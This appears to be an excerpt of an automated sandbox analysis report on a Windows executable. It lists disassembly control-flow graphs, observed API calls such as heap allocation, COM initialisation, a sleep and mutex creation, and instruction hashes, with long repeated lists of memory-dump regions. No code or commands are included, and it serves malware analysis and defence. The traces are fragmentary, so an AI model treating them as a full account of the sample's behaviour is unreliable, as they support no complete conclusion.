                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                                        • String ID: p.gc
                                                                                                                                                                                                        • API String ID: 1721193555-2259671528
                                                                                                                                                                                                        • Opcode ID: 32d10b5dce5e13b95b4b22d6f53b8c4c8a0b1a746d66ce0202467b598548ce27
                                                                                                                                                                                                        • Instruction ID: 14159c79f1c66157e7745be148c34b095e191b89cfa5e822a0f99dc70284834b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32d10b5dce5e13b95b4b22d6f53b8c4c8a0b1a746d66ce0202467b598548ce27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8D1F570E006189BDF28BB28CD4B7DD7B71AB45314F54829CE4196B3D2DB358E948BD2

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 487 ed6ef-ed6fa 488 ed6fc-ed706 487->488 489 ed708-ed70e 487->489 488->489 490 ed73c-ed747 call e7443 488->490 491 ed727-ed738 RtlAllocateHeap 489->491 492 ed710-ed711 489->492 497 ed749-ed74b 490->497 493 ed73a 491->493 494 ed713-ed71a call e9c81 491->494 492->491 493->497 494->490 500 ed71c-ed725 call e8cf9 494->500 500->490 500->491
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000EA6D3,00000001,00000364,00000006,000000FF,?,000EECFF,?,00000004,00000000,?,?), ref: 000ED730
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID: @2
                                                                                                                                                                                                        • API String ID: 1279760036-3701443097
                                                                                                                                                                                                        • Opcode ID: 88d3ef2870aefc5c4d6738ad9e2a69beb184c8a1fd4a547061d9b41da5972a72
                                                                                                                                                                                                        • Instruction ID: 843a5740d5d910c64ebce0c9c8a489bbf8e4a49b100f7f50723091634a56be03
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88d3ef2870aefc5c4d6738ad9e2a69beb184c8a1fd4a547061d9b41da5972a72
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCF0E93164E1A46E9B713B239C01B9B37C9DF817B0B288123AC98BA192EA71DC0053F1

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 503 bb0d0-bb11c 543 bb11d call 529087b 503->543 544 bb11d call 52908a4 503->544 504 bb122-bb140 505 bb147-bb14c 504->505 505->505 506 bb14e-bb2ff call c7f30 call c8440 * 2 call c7870 call c8440 * 3 CoInitialize 505->506 521 bb32a-bb67f 506->521 532 bb685-bb691 521->532 533 bb8f4-bb911 call ccf21 521->533 534 bb8ea-bb8f1 call cd593 532->534 535 bb697-bb6a5 532->535 534->533 535->534 537 bb912-bb917 call e6b9a 535->537 543->504 544->504
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000BB2F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                        • String ID: p.gc
                                                                                                                                                                                                        • API String ID: 2538663250-2259671528
                                                                                                                                                                                                        • Opcode ID: e2f9d4bc9839f9e1f316952cfc262ecb0affcd8c81d7dc1a3d8924d215a9df0b
                                                                                                                                                                                                        • Instruction ID: 990acbc74e0a0f17266862f6b8cc120b9f1ec3f022959da6406ee2bf07824b92
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2f9d4bc9839f9e1f316952cfc262ecb0affcd8c81d7dc1a3d8924d215a9df0b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73B10770A10268DFEB29CF14CD98BDEB7B5EF49304F5081D9E809A7281D775AA84CF91

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 545 b9ad5-b9cc1 call c7870 call b5b20 call b8a60 call c8150
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: b6accec5d80209763c710426dc8251f4a7021efcf314105e87755d6fb768df47
                                                                                                                                                                                                        • Instruction ID: b17f115da55fb66baa9ed7ba3ce593b88354865878fa1bba72c7172ccd18b1d4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6accec5d80209763c710426dc8251f4a7021efcf314105e87755d6fb768df47
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38315B717142449BEB089B78ED8CBEDBA72DF8A310F20822CE114AB7D6DB7599818751

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 567 b9e74-b9e94 571 b9ec2-b9ede 567->571 572 b9e96-b9ea2 567->572 573 b9f0c-b9f2b 571->573 574 b9ee0-b9eec 571->574 575 b9eb8-b9ebf call cd593 572->575 576 b9ea4-b9eb2 572->576 579 b9f59-ba846 call c7f30 573->579 580 b9f2d-b9f39 573->580 577 b9eee-b9efc 574->577 578 b9f02-b9f09 call cd593 574->578 575->571 576->575 581 ba85b 576->581 577->578 577->581 578->573 584 b9f3b-b9f49 580->584 585 b9f4f-b9f56 call cd593 580->585 587 ba883-ba8c4 Sleep CreateMutexA 581->587 588 ba85b call e6b9a 581->588 584->581 584->585 585->579 597 ba8d7-ba8d8 587->597 598 ba8c6-ba8c8 587->598 588->587 598->597 599 ba8ca-ba8d5 598->599 599->597
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
